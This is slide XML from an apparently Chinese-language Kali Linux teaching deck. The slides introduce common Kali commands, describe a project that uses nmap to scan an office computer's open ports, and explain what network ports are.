                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目分析】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="3303905"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:t>Kali Linux是专门用于渗透测试的Linux操作系统。利用Kali Linux进行渗透测试的前提是要掌握它的一些常用命令。本节主要介绍一些Kali Linux使用过程中的一些常用命令，为以后系统学习Kali Linux打下基础。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="矩形 77"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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79" name="矩形 78"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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17" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Kali Linux常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目分析】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="3303905"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:t>本项目使用Kali Linux操作系统中的nmap工具进行端口扫描，确认在线办公计算机开放的端口。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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6" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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a:xfrm>
            <a:off x="5554701" y="1118051"/>
            <a:ext cx="5442585" cy="3747135"/>
            <a:chOff x="6627851" y="1754191"/>
            <a:chExt cx="5442585" cy="3747135"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="2086296"/>
              <a:ext cx="4777105" cy="3415030"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>      </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> 端口，就好像门牌号，客户端可以通过IP地址找到对应的服务器端，但是服务器端是有很多端口的，每个应用程序对应一个端口号，通过类似门牌号的端口号，客户端才能真正地访问到该服务器。为了对端口进行区分，将每个端口进行了编号，这就是端口号。根据使用协议的不同，可以将这些端口分成“TCP协议端口”和“UDP协议端口”两种不同的类型。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="1754191"/>
              <a:ext cx="1097280" cy="368300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr dirty="0">
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>端口简介</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【相关知识】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18" descr="D:\用户目录\Desktop\政治审核\PPT用图\Render2.jpgRender2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="361315" y="2200275"/>
            <a:ext cx="4585335" cy="3115945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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9" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
